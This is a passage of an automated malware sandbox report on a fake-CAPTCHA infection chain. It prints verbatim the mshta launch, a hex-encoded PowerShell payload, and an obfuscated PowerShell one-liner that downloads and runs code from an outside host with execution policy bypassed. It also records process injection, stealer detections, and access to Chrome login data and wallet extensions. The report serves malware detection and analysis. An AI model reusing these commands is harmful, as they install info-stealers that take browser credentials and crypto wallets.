                    Source: mshta.exe, 00000002.00000003.1778044565.000000000286D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780491808.0000000002802000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1777514381.0000000002801000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1769853728.000000000286D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780645994.000000000286D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: mshta.exe, 00000002.00000003.1777514381.000000000282C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1780491808.000000000282C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                    Source: mshta.exe, 00000002.00000002.1780783376.00000000028CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~
                    Source: powershell.exe, 00000006.00000002.2683246502.000000000350A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke()
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://solve.fizq.net/awjxs.captchaJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function ERrXH($NPRZ){return -split ($NPRZ -replace '..', '0x$& ')};$ZMcko = ERrXH('6C99A336230E5A2C9C9A564A467FCC7257DD8D73078CDDBE02A1C1E1CFEDEF1F69966C54CB1E0285E1AC81545FC7B37E41947EEF4312D686A1E5ECA561E4B330B6BA4E39137E46B1CF88F17B1CB79DDD3D8F77137F26D2026351102801E1B8EE83DC3C63D271BF7B2D32A103440FFAF27E51B9A655BC0FF4EAF17755211742BE41D6E00A001C4AB1700E496BCEB4C89D00508B0B68540C20C935204C74F180AA8B22C7493BDE52C7E082CAA9BE5DA2E40EDA75A53BD815D984B8564B6C5038B4A08214FF76BAA31263424BB9E93A9CE0F6F32C5E9C04A3878210984A5C49EF44488BBF880C62CFC91A641624C5D3BBD2FC8D663749EC8640E19E84846FD13EBD37FE167ECAADF42A3A5F25585727DE5C37C223ECF8D8B397DCD90774ADCB0FD58898F52117E75CF08D8FF61DB1811D9B84EFF315D837D713331AFE66E19BFD84FF8BA54B199FCB0269CBE56507C12EA8637FEA0A67B6D12314008A1A25D934DBDC48FA684F23E9C501CDA3D6EDD7E1DB27877FEBE1B1434E17BC899F36D51BA739F6507615383E3B76DC4DA7CF7DB096F71CD34EF427E409688C24F8BB3BD0F3DB16EAABE36CD48798812B320FEA85CA4F71867DC6D48582D5777965011C7B4801FB2CDB18E83428C7808F638DAAF946C009B3F07F09FF06C12C76831DD7747D232DFD24FB9801CADBFD5E5EC908A1E51EC88CDE84AF039CE48EFE74A558CA4CBD92F3BCFA89B2AA00759AF0A0859F3F4ED35DBE2626C1F3844FACFBE69C3AF62DE312661FA0A1C9EF460D20A5D199852B92C4883BFF88E5B2F1FDABA90D71163E5DDB1A17351D3D569C380BD9B27019E63CAD3FBC9C1BF7848CF286360E4C58DC0982C67C6AEF5785616C9877FDCC9B73B1A787A21FBB8F5F7E06CCEF0CBA53610C8E0459F28EE99160390976D4765E779A2A809EC1AB4F2D73A45E246DFF920777B514611903535C5ED407ADDBF093B0601148111BDF803C8B56E525FA9858F48A247B21967016E863E2168D3C4E89C41F15B44CEDBF3C30A49DB22F27A6E8D16F4FDB02943C76ACD372022387AC294C26B60DAF5F676870DAA3C0FB0B090D7996806834504CCE1C17B4E8229467DA457082CAF7F79AC294EB12BF534C76E52C69F0E157B56FD8069B76BDB2EED8385CD903FA7A13DA82CDBF4E8A8CF38A0A2E5F4242E1C26E5BCB6F3AF8E2445C1B494CCB5C69DC58B7746F0C79D2DA716530BDCA02459C015DBB2ABEA4BECB26097E41CE2FBD300A920FD18318366C5D4B7A04C833A236496C4C8A6188EE9A72760FA54EB5221B2960085B7A18CBB9E11E7CC4689666D213681E9A7D41F02061038A45FF0FE8EBBC097E9B2E8CAC4EDF3BF43758115832CE1E28283D795091E9DAAAC752BD4A4516CE6DDB72B53E8186CA1A4D77D156AFBE03BE987790E9776784A6E70627F727ED765D7F51E83778A499E2FF2CD51DA0DBFD933914AEF22FD2CDEAEB1305C5570317DB8D7475A9AD738EBF387927CED9E50E2B520DD916ED2A173D9E003B4C8EF8F37E793194E4E01D9D0CF44488AFE08088233788987E7EF92C4EA59C09AE3C6978D85B80137C2B4DC42B109F4299AB74B6133D2390EB63B68D01047C56B1C0BAD51059ED21678A8D190F8061EF4644822357A50DF94B8A4E44A6420B241971988F3D27094F5CC39FE50EFB4536F7FF84CB61206C5799806EE78F9E92132F0629C8062B57966710BDE9EF5D86960E07F6CAC367FC1C647D09612B8C1B9FCADAD251FDD08F3143C2A62095850DE26FAB05330A6052FC0C7B88A7633F8EB38E499149753BB3838C0CFCDFD806F53E3DF94F3B82207E016C20A230EA548FAAA34253FDA1400710D76D7406BAE6A40B73B79AD689C21A5D886E4AF2806C14F3364355409B48AF74043DA8F661C1504E41E526A00634CB7BE67747BCECEB4FDFBB3CAB9FA8A9889564D5F64BEF7D5626DA881E86F66Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke() Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function errxh($nprz){return -split ($nprz -replace '..', '0x$& ')};$zmcko = errxh('6c99a336230e5a2c9c9a564a467fcc7257dd8d73078cddbe02a1c1e1cfedef1f69966c54cb1e0285e1ac81545fc7b37e41947eef4312d686a1e5eca561e4b330b6ba4e39137e46b1cf88f17b1cb79ddd3d8f77137f26d2026351102801e1b8ee83dc3c63d271bf7b2d32a103440ffaf27e51b9a655bc0ff4eaf17755211742be41d6e00a001c4ab1700e496bceb4c89d00508b0b68540c20c935204c74f180aa8b22c7493bde52c7e082caa9be5da2e40eda75a53bd815d984b8564b6c5038b4a08214ff76baa31263424bb9e93a9ce0f6f32c5e9c04a3878210984a5c49ef44488bbf880c62cfc91a641624c5d3bbd2fc8d663749ec8640e19e84846fd13ebd37fe167ecaadf42a3a5f25585727de5c37c223ecf8d8b397dcd90774adcb0fd58898f52117e75cf08d8ff61db1811d9b84eff315d837d713331afe66e19bfd84ff8ba54b199fcb0269cbe56507c12ea8637fea0a67b6d12314008a1a25d934dbdc48fa684f23e9c501cda3d6edd7e1db27877febe1b1434e17bc899f36d51ba739f6507615383e3b76dc4da7cf7db096f71cd34ef427e409688c24f8bb3bd0f3db16eaabe36cd48798812b320fea85ca4f71867dc6d48582d5777965011c7b4801fb2cdb18e83428c7808f638daaf946c009b3f07f09ff06c12c76831dd7747d232dfd24fb9801cadbfd5e5ec908a1e51ec88cde84af039ce48efe74a558ca4cbd92f3bcfa89b2aa00759af0a0859f3f4ed35dbe2626c1f3844facfbe69c3af62de312661fa0a1c9ef460d20a5d199852b92c4883bff88e5b2f1fdaba90d71163e5ddb1a17351d3d569c380bd9b27019e63cad3fbc9c1bf7848cf286360e4c58dc0982c67c6aef5785616c9877fdcc9b73b1a787a21fbb8f5f7e06ccef0cba53610c8e0459f28ee99160390976d4765e779a2a809ec1ab4f2d73a45e246dff920777b514611903535c5ed407addbf093b0601148111bdf803c8b56e525fa9858f48a247b21967016e863e2168d3c4e89c41f15b44cedbf3c30a49db22f27a6e8d16f4fdb02943c76acd372022387ac294c26b60daf5f676870daa3c0fb0b090d7996806834504cce1c17b4e8229467da457082caf7f79ac294eb12bf534c76e52c69f0e157b56fd8069b76bdb2eed8385cd903fa7a13da82cdbf4e8a8cf38a0a2e5f4242e1c26e5bcb6f3af8e2445c1b494ccb5c69dc58b7746f0c79d2da716530bdca02459c015dbb2abea4becb26097e41ce2fbd300a920fd18318366c5d4b7a04c833a236496c4c8a6188ee9a72760fa54eb5221b2960085b7a18cbb9e11e7cc4689666d213681e9a7d41f02061038a45ff0fe8ebbc097e9b2e8cac4edf3bf43758115832ce1e28283d795091e9daaac752bd4a4516ce6ddb72b53e8186ca1a4d77d156afbe03be987790e9776784a6e70627f727ed765d7f51e83778a499e2ff2cd51da0dbfd933914aef22fd2cdeaeb1305c5570317db8d7475a9ad738ebf387927ced9e50e2b520dd916ed2a173d9e003b4c8ef8f37e793194e4e01d9d0cf44488afe08088233788987e7ef92c4ea59c09ae3c6978d85b80137c2b4dc42b109f4299ab74b6133d2390eb63b68d01047c56b1c0bad51059ed21678a8d190f8061ef4644822357a50df94b8a4e44a6420b241971988f3d27094f5cc39fe50efb4536f7ff84cb61206c5799806ee78f9e92132f0629c8062b57966710bde9ef5d86960e07f6cac367fc1c647d09612b8c1b9fcadad251fdd08f3143c2a62095850de26fab05330a6052fc0c7b88a7633f8eb38e499149753bb3838c0cfcdfd806f53e3df94f3b82207e016c20a230ea548faaa34253fda1400710d76d7406bae6a40b73b79ad689c21a5d886e4af2806c14f3364355409b48af74043da8f661c1504e41e526a00634cb7be67747bceceb4fdfbb3cab9fa8a9889564d5f64bef7d5626da881e86f66
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command set-item variable:/b 'net.webclient';sv plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;si variable:\z (.$executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where-object{(dir variable:\_).value.name-like'g*cm*t'}).name).invoke($executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name)|gm|where-object{(dir variable:\_).value.name-like'*com*e'}).name).invoke('*w-*ct',1,$true))(childitem variable:\b).value);si variable:o ((((variable z).value|gm)|where-object{(dir variable:\_).value.name-like'*wn*g'}).name);($executioncontext|foreach{(dir variable:\_).value.(($executioncontext|gm)[6].name)|foreach{$_.(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where-object{(dir variable:\_).value.name-like'*w*i*ck'}).name).invoke((variable z).value.((gv o -valueo)).invoke((variable plm).value))}}).invoke()
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function errxh($nprz){return -split ($nprz -replace '..', '0x$& ')};$zmcko = errxh('6c99a336230e5a2c9c9a564a467fcc7257dd8d73078cddbe02a1c1e1cfedef1f69966c54cb1e0285e1ac81545fc7b37e41947eef4312d686a1e5eca561e4b330b6ba4e39137e46b1cf88f17b1cb79ddd3d8f77137f26d2026351102801e1b8ee83dc3c63d271bf7b2d32a103440ffaf27e51b9a655bc0ff4eaf17755211742be41d6e00a001c4ab1700e496bceb4c89d00508b0b68540c20c935204c74f180aa8b22c7493bde52c7e082caa9be5da2e40eda75a53bd815d984b8564b6c5038b4a08214ff76baa31263424bb9e93a9ce0f6f32c5e9c04a3878210984a5c49ef44488bbf880c62cfc91a641624c5d3bbd2fc8d663749ec8640e19e84846fd13ebd37fe167ecaadf42a3a5f25585727de5c37c223ecf8d8b397dcd90774adcb0fd58898f52117e75cf08d8ff61db1811d9b84eff315d837d713331afe66e19bfd84ff8ba54b199fcb0269cbe56507c12ea8637fea0a67b6d12314008a1a25d934dbdc48fa684f23e9c501cda3d6edd7e1db27877febe1b1434e17bc899f36d51ba739f6507615383e3b76dc4da7cf7db096f71cd34ef427e409688c24f8bb3bd0f3db16eaabe36cd48798812b320fea85ca4f71867dc6d48582d5777965011c7b4801fb2cdb18e83428c7808f638daaf946c009b3f07f09ff06c12c76831dd7747d232dfd24fb9801cadbfd5e5ec908a1e51ec88cde84af039ce48efe74a558ca4cbd92f3bcfa89b2aa00759af0a0859f3f4ed35dbe2626c1f3844facfbe69c3af62de312661fa0a1c9ef460d20a5d199852b92c4883bff88e5b2f1fdaba90d71163e5ddb1a17351d3d569c380bd9b27019e63cad3fbc9c1bf7848cf286360e4c58dc0982c67c6aef5785616c9877fdcc9b73b1a787a21fbb8f5f7e06ccef0cba53610c8e0459f28ee99160390976d4765e779a2a809ec1ab4f2d73a45e246dff920777b514611903535c5ed407addbf093b0601148111bdf803c8b56e525fa9858f48a247b21967016e863e2168d3c4e89c41f15b44cedbf3c30a49db22f27a6e8d16f4fdb02943c76acd372022387ac294c26b60daf5f676870daa3c0fb0b090d7996806834504cce1c17b4e8229467da457082caf7f79ac294eb12bf534c76e52c69f0e157b56fd8069b76bdb2eed8385cd903fa7a13da82cdbf4e8a8cf38a0a2e5f4242e1c26e5bcb6f3af8e2445c1b494ccb5c69dc58b7746f0c79d2da716530bdca02459c015dbb2abea4becb26097e41ce2fbd300a920fd18318366c5d4b7a04c833a236496c4c8a6188ee9a72760fa54eb5221b2960085b7a18cbb9e11e7cc4689666d213681e9a7d41f02061038a45ff0fe8ebbc097e9b2e8cac4edf3bf43758115832ce1e28283d795091e9daaac752bd4a4516ce6ddb72b53e8186ca1a4d77d156afbe03be987790e9776784a6e70627f727ed765d7f51e83778a499e2ff2cd51da0dbfd933914aef22fd2cdeaeb1305c5570317db8d7475a9ad738ebf387927ced9e50e2b520dd916ed2a173d9e003b4c8ef8f37e793194e4e01d9d0cf44488afe08088233788987e7ef92c4ea59c09ae3c6978d85b80137c2b4dc42b109f4299ab74b6133d2390eb63b68d01047c56b1c0bad51059ed21678a8d190f8061ef4644822357a50df94b8a4e44a6420b241971988f3d27094f5cc39fe50efb4536f7ff84cb61206c5799806ee78f9e92132f0629c8062b57966710bde9ef5d86960e07f6cac367fc1c647d09612b8c1b9fcadad251fdd08f3143c2a62095850de26fab05330a6052fc0c7b88a7633f8eb38e499149753bb3838c0cfcdfd806f53e3df94f3b82207e016c20a230ea548faaa34253fda1400710d76d7406bae6a40b73b79ad689c21a5d886e4af2806c14f3364355409b48af74043da8f661c1504e41e526a00634cb7be67747bceceb4fdfbb3cab9fa8a9889564d5f64bef7d5626da881e86f66Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command set-item variable:/b 'net.webclient';sv plm 'https://atsuka.thrivezest.org/hubus.xlm';sl;si variable:\z (.$executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where-object{(dir variable:\_).value.name-like'g*cm*t'}).name).invoke($executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name)|gm|where-object{(dir variable:\_).value.name-like'*com*e'}).name).invoke('*w-*ct',1,$true))(childitem variable:\b).value);si variable:o ((((variable z).value|gm)|where-object{(dir variable:\_).value.name-like'*wn*g'}).name);($executioncontext|foreach{(dir variable:\_).value.(($executioncontext|gm)[6].name)|foreach{$_.(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where-object{(dir variable:\_).value.name-like'*w*i*ck'}).name).invoke((variable z).value.((gv o -valueo)).invoke((variable plm).value))}}).invoke() Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 6.2.powershell.exe.d461e90.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.powershell.exe.d461e90.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2813404644.000000000D3E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected zgRAT
                    Source: Yara matchFile source: 6.2.powershell.exe.d461e90.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.powershell.exe.d461e90.2.unpack, type: UNPACKEDPE
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
